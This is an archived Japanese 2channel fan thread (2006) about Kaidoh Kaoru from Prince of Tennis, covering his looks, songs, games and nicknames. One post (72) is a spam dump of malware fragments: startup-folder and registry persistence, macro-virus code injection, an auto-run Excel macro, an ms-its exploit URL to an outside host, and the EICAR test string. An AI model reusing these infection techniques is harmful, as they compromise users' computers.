5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【粘り?】テニプリ 海堂薫に萌えるスレ2フシュー【見たいか】

1 :名無しかわいいよ名無し:2006/12/06(水) 00:50:50 ID:Jb5C3GfG
青学の海堂薫に萌えるスレです。
前スレ http://comic6.2ch.net/test/read.cgi/cchara/1142498169/901-1000

2 :名無しかわいいよ名無し:2006/12/06(水) 01:00:34 ID:FT127j93
おらおら、WWF(World Wide Fund for Nature:世界自然保護基金)の
愛くるしいパンダ様が>>2ゲットだぜ! 頭が高いんだよ、ボケ!

.         ,:::-、       __     >1 クソスレ建ててんじゃねーよ。ビンスみてーに裁判で潰しちまうぞ。
    ,,r   〈:::::::::)    ィ::::::ヽ    >3 >>2ゲットも満足にできねーお前は、俺の着ぐるみ着てプラカード持ってろ(プ
  〃   ,::::;r‐'´       ヽ::ノ     >4 お前はカキフライのAAでも貼ってりゃいいんだよ、リア厨ヒッキー(プ
  ,'::;'   /::/  __            >5 汗臭いキモヲタデブは2ちゃんと一緒に人生終了させろ、バーカ。
.  l:::l   l::::l /:::::)   ,:::::、  ji     >6 いまさら>>2ゲット狙ってんじゃねーよ、タコ。すっトロいんだよ。
  |::::ヽ j::::l、ゝ‐′  ゙:;;:ノ ,j:l     >7 ラッキーセブンついでに教えてやるが、俺はストーンコールドが好きだぜ。
  }:::::::ヽ!::::::::ゝ、 <:::.ァ __ノ::;!     >8 知性のねーカキコだが、お前の人生の中で精一杯の自己表現かもな(プ
.  {::::::::::::::::::::::::::::`='=‐'´:::::::::/      >9 つーか、自作自演でこのスレ盛り上げて何が楽しいんだ?
  ';::::::::::::ト、::::::::::::::i^i::::::::::::/      >10-999 WWEなんか見てるヒマがあったら、俺に募金しろカスども。
.   `ー--' ヽ:::::::::::l l;;;;::::ノ       >1000 1000ゲットしたって、WWF時代の映像物に販売許可は出さねーよ。
        `ー-"

3 :名無しかわいいよ名無し:2006/12/06(水) 01:29:14 ID:V38ufd2X
>1
乙!

4 :名無しかわいいよ名無し:2006/12/06(水) 13:45:48 ID:uEslxAYZ
パンダさんが来てくれて海堂も大喜びだなw

5 :名無しかわいいよ名無し:2006/12/06(水) 17:32:56 ID:tnwXM6yB
海堂タンまたきたよー!

6 :名無しかわいいよ名無し:2006/12/07(木) 04:24:36 ID:QtrUShqV
覆面、海堂ならキレると思ったのにな…

7 :名無しかわいいよ名無し:2006/12/07(木) 16:07:57 ID:hzsvn3N2
スレ立て乙!    ゞ
ラッキー7get (´・ω・`)

8 :名無しかわいいよ名無し:2006/12/07(木) 18:04:57 ID:s5c8/xIf
2スレ目おめでとー!これからも海堂応援します!

9 :名無しかわいいよ名無し:2006/12/07(木) 18:42:00 ID:MuMeGIRN
街道人気ないのかな
なんかさみしい

10 :名無しかわいいよ名無し:2006/12/07(木) 23:59:48 ID:tJHo7Vgx
さすが薫ちゃんのスレ
早速パンダさんが降臨かwwwww


11 :名無しかわいいよ名無し:2006/12/08(金) 17:42:00 ID:1EhlGIYQ
>>9
なんでそう思うの??

12 :名無しかわいいよ名無し:2006/12/08(金) 18:07:44 ID:ZmopC5OY
>>11
多分スレ速が同じでもレス数で過疎っぽいと錯覚してるんだよ

まぁ、海堂ファンはシャイなイマゲ有るし
カキコ人数よりROMってる人数が多そうな気はするが

13 :名無しかわいいよ名無し:2006/12/09(土) 00:29:49 ID:nWD/OS+b
今気づいたけどさりげなく>>7に千石が来てたのねw
この二人接点ないのにw

14 :名無しかわいいよ名無し:2006/12/09(土) 10:56:47 ID:o6dBgI38
山吹戦では補欠だったからね

15 :名無しかわいいよ名無し:2006/12/09(土) 12:36:49 ID:8BK4GQGv
間に桃城か亜久津を置くと接点が見えてくる

海堂(ライバル)桃城(ダンク)千石
海堂(恐面)亜久津(山吹)千石

まぁやっぱり当人同士は接点ないけども

16 :名無しかわいいよ名無し:2006/12/09(土) 13:27:13 ID:a81eqfOy
薫ちゃんは礼儀正しいから、
キヨやジローのようなノリの人にも敬語なのだろうと思うと萌え。

17 :名無しかわいいよ名無し:2006/12/09(土) 14:00:07 ID:+0m9LBH1
ゲームでは敬語使ってない先輩(他校)もいたけど
宍戸には敬語だった。

18 :名無しかわいいよ名無し:2006/12/09(土) 15:25:17 ID:o6dBgI38
原作ではあの野郎だったような

19 :名無しかわいいよ名無し:2006/12/09(土) 17:56:06 ID:ASli9RSi
堪忍してぇな
ジャスコ開店しとるやんか

20 :名無しかわいいよ名無し:2006/12/09(土) 18:25:06 ID:8BK4GQGv
ちょwww小春www
何故ジャスコwww

21 :名無しかわいいよ名無し:2006/12/09(土) 20:45:15 ID:hI4e7ok9
ジャイロ回転について調べてみたけどよく理解できなかったぜ

22 :名無しかわいいよ名無し:2006/12/10(日) 20:44:31 ID:xRYPT5tU
なんか他にも他校で仲良くできそうなキャラいないか気になってきたw

23 :名無しかわいいよ名無し:2006/12/10(日) 21:02:51 ID:V2OMMQHD
アニメではやたら観月さんが絡んできたが・・・

24 :名無しかわいいよ名無し:2006/12/10(日) 23:35:11 ID:4xCSa9QC
海堂のルドルフジャージの似合わなさには吹いた。
多分あの制服も似合わないだろうな…

25 :名無しかわいいよ名無し:2006/12/10(日) 23:37:51 ID:xGu5uOtc
ユニはともかく
制服ならバンダナしないから似合うと思う

26 :名無しかわいいよ名無し:2006/12/10(日) 23:39:37 ID:xGu5uOtc
ふと思い出したが
『走れ桃!』で
桃城もルドのユニ着たことあったな

27 :名無しかわいいよ名無し:2006/12/11(月) 01:47:19 ID:ZszATzWn
バンダナなしでルドのジャージ着たらきっと可愛い。ルド制服ももちろん可愛い。

28 :名無しかわいいよ名無し:2006/12/11(月) 01:59:09 ID:18gXB7FK
前に誰かも言ってたけど不動峰のジャージとか似合いそうだな(バンダナなし)


29 :名無しかわいいよ名無し:2006/12/11(月) 02:14:45 ID:cuv/Q9y0
長袖似合わないからなぁ。
青学みたいなジャージらしいフォルム以外だと厳しいかも

30 :名無しかわいいよ名無し:2006/12/11(月) 03:08:24 ID:18gXB7FK
>長袖似合わないからなぁ。

え、逆じゃないの?半袖の方が似合わなそう…

31 :名無しかわいいよ名無し:2006/12/11(月) 06:47:41 ID:bs2Jiv3z
そこで六角ですよ

32 :名無しかわいいよ名無し:2006/12/11(月) 08:00:19 ID:qR/2DcrR
ぜひ比嘉中のノースリーブをw

33 :名無しかわいいよ名無し:2006/12/11(月) 08:33:43 ID:oOErKfFl
立海のユニも着たしなにげにコスプレ好きなマムたん。

>32
エロ過ぎて正視できません><

34 :名無しかわいいよ名無し:2006/12/11(月) 10:35:35 ID:95g1nZnw
なんだかんだで青学ジャージが一番好きだなぁ…
アニメのバンダナ無し&半袖のコンボは可愛すぎ

35 :名無しかわいいよ名無し:2006/12/11(月) 11:08:21 ID:b4IB7JN1
バンダナ外した時のギャップがいいw

36 :名無しかわいいよ名無し:2006/12/11(月) 11:44:49 ID:M5AAnmNg
つーか
ルドのユニフォームには
緑のバンダナが似合わないだけだと思う
色変えればイケるんじゃないか?

>>35
確かに!!
海堂といえばバンダナだが
あのはずした時のギャップというかナチュラルな黒髪がまたイイんだ


37 :名無しかわいいよ名無し:2006/12/11(月) 11:48:22 ID:cuv/Q9y0
バンダナ外した方が可愛くて好きだ。
つかなんで上半身裸になってもバンダナなんだw

38 :名無しかわいいよ名無し:2006/12/11(月) 17:07:38 ID:fAZfGeHK
可愛い(*^_^*)

39 :名無しかわいいよ名無し:2006/12/11(月) 20:14:40 ID:ZszATzWn
バンダナジャージの時の男らしさとバンダナなし学ランの時の清純さのギャップがたまらん

40 :名無しかわいいよ名無し:2006/12/11(月) 20:31:29 ID:6mBZy8DM
>>39
    ゞ
 (´・ω・`)  きよすみ?

41 :名無しかわいいよ名無し:2006/12/11(月) 20:33:39 ID:ZszATzWn
ノン

42 :名無しかわいいよ名無し:2006/12/11(月) 21:05:39 ID:oOErKfFl
>>37
文字通り頭隠して・・・ですな。

43 :名無しかわいいよ名無し:2006/12/11(月) 22:03:54 ID:+S8s5QC6
バンダナは緑よりこないだの巻頭カラーのみたいな赤の方が好きだ。

44 :名無しかわいいよ名無し:2006/12/11(月) 23:04:33 ID:jBuWcZRs
原作だとカラー毎にバンダナの色違うよね
自分は白いバンダナが結構新鮮だった

45 :名無しかわいいよ名無し:2006/12/12(火) 06:16:51 ID:KsCxmFSE
ウサギ柄だかのトチ狂ったのも見たような。アニメだっけ?

新スレが立ってから書き込みが多くて嬉しいな

46 :名無しかわいいよ名無し:2006/12/12(火) 07:01:00 ID:iWtFWwF1
>>45
同人じゃないの?

47 :名無しかわいいよ名無し:2006/12/12(火) 07:38:55 ID:6ONoARXf
>>46
ゲームの特典のボイスカードかと。
試着してるの桃城と越前に見られて照れてんだよ

48 :名無しかわいいよ名無し:2006/12/12(火) 11:43:39 ID:OM3W6NVm
アニメの1年海堂の可愛さは異常。
いつ見てもヒヨコを思い出す

49 :名無しかわいいよ名無し:2006/12/12(火) 14:49:17 ID:vDy8s0Fe
>>47
そのボイカ持ってる。ピンク地にうざぎと人参柄のバンダナしてる。
「あっ!いっ、今見たことは全て早急かつ全力で忘れろっ!!」って言うんだよ。可愛すぎw


ふとアニメの提供バックで海堂がピンクのタンクトップ着てピンクの花つけてたの思い出した。
公式スタッフも公認の可愛さw

50 :名無しかわいいよ名無し:2006/12/12(火) 15:26:58 ID:KsCxmFSE
可愛さと言うか遊ばれているだけというか・・・

51 :名無しかわいいよ名無し:2006/12/13(水) 01:47:04 ID:W7VQVluO
>>49
ピンクのタンクトップ姿見た時ガチで昇天出来そうだったw
タンクトップ姿ってだけでときめくのにピンクとか花とか…
ギャップがあってかわいい

52 :名無しかわいいよ名無し:2006/12/13(水) 02:15:49 ID:4Dwzt0ER
でもあんまり度が過ぎると逆に萎えるかも…
スタッフ遊びすぎだろ('A`)

53 :名無しかわいいよ名無し:2006/12/13(水) 09:50:59 ID:2gDp4iZD
そんなときは原作の初期を読み直します。「2年の恥さらしやがって」とかいってるコマとか純粋にかっこいい

54 :名無しかわいいよ名無し:2006/12/13(水) 12:17:17 ID:M5ucXxuj
ところがどっこい、海堂がカコヨクなってくるのは氷帝あたりからなんだよなぁ…

まぁ個人的な話

55 :名無しかわいいよ名無し:2006/12/13(水) 16:08:04 ID:pJU5dZ6e
海堂はもうカッコイイ&カワイイ。
原作者はもちろん、アニメのスタッフからも愛されてる

56 :名無しかわいいよ名無し:2006/12/13(水) 20:15:30 ID:qm90Folo
Chain Reaction知ってる?
かっこいい

57 :名無しかわいいよ名無し:2006/12/13(水) 23:22:10 ID:v3ObVdm+
アニメから入って原作読んだらギャップを感じたけど、
一人で二度美味しいキャラってことだねw>可愛い&かっこいい
今更キャラソンとか集めだしたよ

58 :名無しかわいいよ名無し:2006/12/14(木) 01:08:22 ID:zzeXf2aW
>56
カッコイイ。大好き。歌うまくないのにあれは凄くうまく感じるw


59 :名無しかわいいよ名無し:2006/12/14(木) 02:01:30 ID:CzzBBkta
1巻の絵は海堂に限らずみんな顔がキモイ

60 :名無しかわいいよ名無し:2006/12/14(木) 02:45:38 ID:dIITbTJ+
一巻の海堂の顔大好きな自分は少数派かw?

61 :名無しかわいいよ名無し:2006/12/14(木) 07:13:28 ID:rcYkGdi4
>>57
薫海堂のうた少ないよね…。hey!も最高(*´д`*)

62 :名無しかわいいよ名無し:2006/12/14(木) 09:42:35 ID:jiwKf0Cm
>>61
なんだ薫海堂ってw

63 :名無しかわいいよ名無し:2006/12/14(木) 14:54:58 ID:lfpjQc74
>>61
欧米か!

64 :61:2006/12/14(木) 16:38:25 ID:rcYkGdi4
ちょwwww
素で間違えたwwww








いい名だね、薫サン

65 :名無しかわいいよ名無し:2006/12/14(木) 19:37:59 ID:ohl9gfVN
海堂薫は普通に歌うまいと思う。
シングルだけじゃなくてアルバムも出して欲しいと思うのは自分だけ…?
他のキャラは結構出してるのに。

66 :名無しかわいいよ名無し:2006/12/14(木) 19:56:41 ID:ZwqVEakZ
うん、出してほしい!
2曲しか聴いたことない(´・ω・`)激しくキボン

67 :名無しかわいいよ名無し:2006/12/14(木) 20:48:27 ID:rcYkGdi4
アニメのep.137の海堂寝かけてるの?これ

68 :名無しかわいいよ名無し:2006/12/14(木) 21:21:05 ID:2tyCz5kC
ほんとだw意外

69 :名無しかわいいよ名無し:2006/12/14(木) 22:59:41 ID:lSr4ARX8
初期は”絶対”って単語、見せ場とかで効果的に使ってたよね
信念こもってて好きだったのにな


70 :名無しかわいいよ名無し:2006/12/14(木) 23:06:35 ID:uV61l/TE
>>67
今携帯だから確認できないんだが、もしかしてオリジナルの選抜っぽいやつだろ?

71 :名無しかわいいよ名無し:2006/12/15(金) 02:12:24 ID:O9Nbqd8P
アニメと原作で顔が一番違うのって海堂だよね?
髪型もアニメの方が微妙に前髪長いし…

72 :<body onload=window()>:2006/12/15(金) 06:22:47 ID:dqcQDuQS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

73 :名無しかわいいよ名無し:2006/12/15(金) 07:28:47 ID:yzEaz2zQ
原作でも顔変わってきてるよね。
なんて言うか…垢抜けたというか迫力がなくなったと言うか。


74 :名無しかわいいよ名無し:2006/12/16(土) 14:21:01 ID:BsNaosfY
うんw1巻見ると画力は向上してきてるんだなぁって改めて思うw

75 :名無しかわいいよ名無し:2006/12/16(土) 17:13:03 ID:puOJscoc
表情豊かになってきたよね

76 :名無しかわいいよ名無し:2006/12/16(土) 23:41:16 ID:4D/Xvneg
成長したんだねぇ

77 :名無しかわいいよ名無し:2006/12/17(日) 01:35:08 ID:GH5sdfjD
薫ちゃんって違う意味で頭悪そう

78 :名無しかわいいよ名無し:2006/12/17(日) 12:33:57 ID:aWt4696I
勉強はある程度にはできるだろうけど一つのことに集中するとそれしかできなくなるタイプのおバカたんだよな

79 :名無しかわいいよ名無し:2006/12/17(日) 12:45:10 ID:n2DdB+xh
根が善良だからさ、将来何かと騙されそうで心配だよー。


余談だけどPRINCE BOXでカルピンを抱いている姿が可愛すぎる。
いつの間にマムたんの猫になったのw

80 :名無しかわいいよ名無し:2006/12/17(日) 13:23:30 ID:guCuVI1j
>>79
>カルピンを抱いている姿
良かったらうpしてくれないか?クレクレスマソ

81 :名無しかわいいよ名無し:2006/12/17(日) 13:34:24 ID:n2DdB+xh
>>80
オクからの流用だけどほれ
ttp://page16.auctions.yahoo.co.jp/jp/auction/u8328036

82 :名無しかわいいよ名無し:2006/12/17(日) 14:13:35 ID:6NGeLqxV
>>81
80じゃないけど萌 え 死 ん だ  (;´Д`)ハァハァ
ありがdw

83 :名無しかわいいよ名無し:2006/12/17(日) 14:31:27 ID:aWt4696I
携帯からじゃ見れん…OTL
早く家帰ってPCに会いたい。

84 :80:2006/12/17(日) 14:32:48 ID:guCuVI1j
>>81

ぐわああああああああああああ(;´Д`)ハァハァ
ありがとう!
海堂はほんと猫好きだなぁ

85 :名無しかわいいよ名無し:2006/12/17(日) 17:23:30 ID:eYByAbrF
カワユス!!!!!

86 :名無しかわいいよ名無し:2006/12/17(日) 22:51:43 ID:TR8rJvEs
>>81
これほどまでに萌えて、
かつ乾がウザイと思った画像は初めてだwwwwwww

87 :名無しかわいいよ名無し:2006/12/17(日) 23:25:53 ID:L6pG7jxA
乾の体格のおかげか海堂がちっちゃく見えるwてかカワユス

88 :名無しかわいいよ名無し:2006/12/17(日) 23:36:35 ID:NcPq8/Nw
カルピン可愛くないw海堂の方がはるかに可愛いww

89 :名無しかわいいよ名無し:2006/12/18(月) 01:50:39 ID:5ExrjImx
アニメの乾って眉毛が怒ってて恐い

90 :名無しかわいいよ名無し:2006/12/18(月) 03:51:04 ID:G++yQ2X0
眉毛が怒ってるとな?

91 :名無しかわいいよ名無し:2006/12/19(火) 00:40:30 ID:S9liPtIy
アニメの乾は怒り眉毛だよね
原作の方が良い人っぽい顔してる

92 :名無しかわいいよ名無し:2006/12/20(水) 00:46:43 ID:YqNLM//s
乾語りはもうええわww

なんだかさぁ、D2の試合にガッカリしたのは自分だけ?

93 :名無しかわいいよ名無し:2006/12/20(水) 00:52:27 ID:VfiyhkRW
試合自体は期待はずれだったけど海堂萌え要素はすごかった。

94 :名無しかわいいよ名無し:2006/12/20(水) 05:15:31 ID:VaOx8f/E
どこにガッカリしたの?

95 :名無しかわいいよ名無し:2006/12/20(水) 07:13:32 ID:mwFdfD9P
>>92>>93
よかったらどこの学校とか教えてorz
氷帝?

96 :名無しかわいいよ名無し:2006/12/20(水) 15:05:18 ID:VaOx8f/E
>>95
多分この前の小春と一氏のことだと思う

97 :名無しかわいいよ名無し:2006/12/20(水) 15:24:09 ID:Ddk399wZ
そろそろageます

98 :名無しかわいいよ名無し:2006/12/20(水) 20:02:56 ID:mwFdfD9P
>>96
ありがとう!
最近楽しい事何もないけど、薫チャン考えてると暇つぶしになるww

99 :名無しかわいいよ名無し:2006/12/20(水) 22:51:07 ID:aJnkXY8t
1月のOVAが楽しみだよ
海堂の出てる巻だけは買うw

100 :名無しかわいいよ名無し:2006/12/20(水) 23:45:00 ID:VaOx8f/E
100get

101 :名無しかわいいよ名無し:2006/12/21(木) 00:23:37 ID:4qiuarDP
101匹ねこちゃん

102 :名無しかわいいよ名無し:2006/12/21(木) 12:58:23 ID:zAzoNxWq
休日なんで夢駆やってたら手塚部長による薫呼びを見つけた
ちなみに越前家兄弟(青学メンバー)誕生日夢

公式での薫呼びはちょっと(かなり?)レアだな(*´д`)

薫呼びって桃城と跡部だけだっけ?
しかもちゃん付けだよな?

103 :名無しかわいいよ名無し:2006/12/21(木) 13:38:49 ID:hGGBmuvU
アニメじゃ確か菊丸も呼んでたよ
テニプリ一家なんか手塚と乾以外みんな薫ちゃん呼びだったしw

104 :名無しかわいいよ名無し:2006/12/21(木) 13:47:53 ID:zAzoNxWq
>>103
>テニプリ一家なんか手塚と乾以外みんな薫ちゃん呼びだったしw

そういえばそうだw
アニメ本編だと三人か。恐い表情だが愛されてるなwww

105 :名無しかわいいよ名無し:2006/12/21(木) 18:07:09 ID:DqwWThdU
良い名前だよね>薫
キャッチフレーズ大賞みたいので凄い萌えた記憶があるw

微妙にスレチで申し訳ないんだけど、テニスのゲームって乙女ゲー苦手じゃプレイ難しい?
海堂は見たいけど最近のは男主人公も選べないらしいし、友情っぽいので終わるなら買いたいんだけど…orz

106 :名無しかわいいよ名無し:2006/12/21(木) 18:34:06 ID:zAzoNxWq
>>105
友情エンドな印象は女主人公オンリーになってからはないな…
キャラの反応だけを盲目的に見れない人にはあまりおすすめ出来ないかも

そして汗&涙系(初代、2、夢&駆)は試合パートがムズカシス
試合毎に慰められるより誉められたいモノだ

107 :名無しかわいいよ名無し:2006/12/21(木) 18:36:02 ID:speXiQim
ドキサバ買って一番に海堂プレイしますた。
萌死にますた(*´Д`)
ぷぎゃぁぁあああ顔のニヤケがとまんねぇええぅえwwwwwwww
薫たんカッコヨス薫たん

108 :名無しかわいいよ名無し:2006/12/21(木) 18:46:44 ID:DqwWThdU
>>106
そっか…トン!しつこく最強とSHをやっとくw
来年のカードゲームも楽しみにしておこう

109 :名無しかわいいよ名無し:2006/12/22(金) 00:18:17 ID:LWrXIRXW
>>107
詳しいバレを是非ともお願いしたい。

110 :名無しかわいいよ名無し:2006/12/22(金) 00:19:39 ID:TmyLkPQb
>>108
とりあえず薫ちゃんは脚本'sにも好かれてるっぽい
オリジナルキャラ(初代主人公/2以降でNPC)に好かれてたり
動物ネタによる萌え所が毎回あったり赤面回数が亜久津以上だったり

たまに麺を茹でたり…




あれ?最後のカワユスだけど謎じゃね?(*´д`)

111 :名無しかわいいよ名無し:2006/12/22(金) 02:08:02 ID:sTCuh/lk
>>107
詳しく

112 :名無しかわいいよ名無し:2006/12/22(金) 06:13:11 ID:9umpcVJ+
買ってみたいけど抵抗あるな…。
親に見つかったら氏ぬorz

113 :名無しかわいいよ名無し:2006/12/22(金) 10:57:53 ID:WcCekQM/
やってみたいけどプレステ2の本体自体がないから面倒くさい

114 :名無しかわいいよ名無し:2006/12/22(金) 20:53:17 ID:9umpcVJ+
買うの面倒だね
ゲームついてる満喫でやってみようかな


115 :名無しかわいいよ名無し:2006/12/23(土) 01:51:36 ID:wgnG+39c
>>112
私がヲタクだということはもう家族にバレてる…
たまに白い目で見られるけど吹っ切ってしまえば案外楽になれるもんだよ

116 :名無しかわいいよ名無し:2006/12/23(土) 07:07:08 ID:b3VblyuF
>>115
うちの親は保護者会とかでベラベラしゃべるから…


orz
どっかのサイトでとったゲームのボイスで我慢してる

117 :名無しかわいいよ名無し:2006/12/23(土) 16:03:05 ID:rci09Hng
ドキサバではソーイングセット探したり洗濯物干したりと
とても家庭的な薫ちゃんが見れるよw
嫁にほしいwww

118 :名無しかわいいよ名無し:2006/12/23(土) 19:28:33 ID:u6FBZPPF
>>117
エーッ・・・似合うw

119 :名無しかわいいよ名無し:2006/12/24(日) 01:28:28 ID:0pEJoZOm
(´・ω・`)

120 :名無しかわいいよ名無し:2006/12/24(日) 10:44:40 ID:ZUnh8yjC
せめてリョーマを主人公にして絶対絶命都市みたいなシステムだったら…orz
桜乃ちゃんでも主人公にしてメンバー見てニヤニヤするゲームだったら…orz

121 :名無しかわいいよ名無し:2006/12/24(日) 12:37:09 ID:1IaVo5io
絶体絶命都市って?

122 :名無しかわいいよ名無し:2006/12/24(日) 17:09:16 ID:Av7FGzEr
テニプリ   =キャラと恋愛が目的のドキドキサバイバル
絶対絶命都市=死ぬ気で生還が目的のリアルサバイバル

123 :名無しかわいいよ名無し:2006/12/24(日) 17:34:09 ID:3yncAcxC
へたしたら薫ちゃん死んじゃいそうだなそれ…

124 :名無しかわいいよ名無し:2006/12/25(月) 01:08:01 ID:VEFXu8Hu
サバイバルなんかじゃどっちかって言うと守られキャラっぽいよね、薫ちゃん

125 :名無しかわいいよ名無し:2006/12/25(月) 09:37:16 ID:QTuy8mvD
デカい蜘蛛とかにマジでビビリそうな薫たんハァハァ

126 :名無しかわいいよ名無し:2006/12/26(火) 01:37:17 ID:HDNvDPWY
そろそろage

冬休みかと思いきや意外と人いないんだなぁ。
薫たんにメリークリスマス言おうとしたけどもう26日だった…OTL
お年玉持ってハピニュイヤー言いにくるからね薫たん

127 :名無しかわいいよ名無し:2006/12/26(火) 02:22:10 ID:68oKSora
薫たんクリスマスは家族で過ごすのかな。いつもよりちょっと豪華な食事でクリスマスケーキとか。
サンタは本気で信じてそう。というか親がロマンチストで信じさせてそう。

128 :名無しかわいいよ名無し:2006/12/26(火) 04:30:39 ID:9O2QovGB
自分としてはもうちょっとクールであってほしい…

129 :名無しかわいいよ名無し:2006/12/26(火) 06:59:30 ID:U/ri2+lJ
ばかなとこも可愛い!

130 :名無しかわいいよ名無し:2006/12/27(水) 01:52:28 ID:ceDWugt6
薫たんの豪邸にマジ萌え。でかい家だね。

131 :名無しかわいいよ名無し:2006/12/27(水) 02:06:49 ID:7nbtBiyO
豪邸に萌えんの?w

132 :名無しかわいいよ名無し:2006/12/27(水) 11:30:45 ID:AXsgkpH8
ワロスwでも萌えるくらいデカいのも分かる

133 :名無しかわいいよ名無し:2006/12/27(水) 14:34:49 ID:FPZLF8M5
豪華に暮らす薫たん萌え

134 :名無しかわいいよ名無し:2006/12/27(水) 19:09:40 ID:t8QKCvep
10.5巻は海堂萌えのためにあると言っても過言ではないよ。

135 :名無しかわいいよ名無し:2006/12/29(金) 01:38:35 ID:oGSoGKNp
体重は57キロで合ってる?たまに58キロと書いてるとこも見かけるけど…

136 :名無しかわいいよ名無し:2006/12/29(金) 14:44:58 ID:AP9knrH9
>135
57であってる
58は桃城と勘違いしてるんじゃないか?

137 :名無しかわいいよ名無し:2006/12/29(金) 18:50:28 ID:cRbLxJFb
別漫画で恐面・口調が悪目・報われにくいと共通点の多い海堂さんがいた

カブトムシin下駄箱の上履き
蝶々inロッカー
てんとう虫on机のなかのノート

海堂「何なんだちくしょーー!!」

薫ちゃんで想像しても違和感ないんだが

138 :名無しかわいいよ名無し:2006/12/29(金) 18:58:21 ID:67PsLMoK
↑どういうこと?

139 :名無しかわいいよ名無し:2006/12/29(金) 19:49:48 ID:uny9WGYv
>>137
何て漫画?

140 :137:2006/12/29(金) 20:57:31 ID:cRbLxJFb
4ジゲン
著者:にざかな

まぁ4コマ漫画だ。
これに出て来る海堂さんは、見た目は薫ちゃんには似てないが報われなさが近いんだ

何か面白い物ないかなとか思ってる人はちょっと見てみるといいよ

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)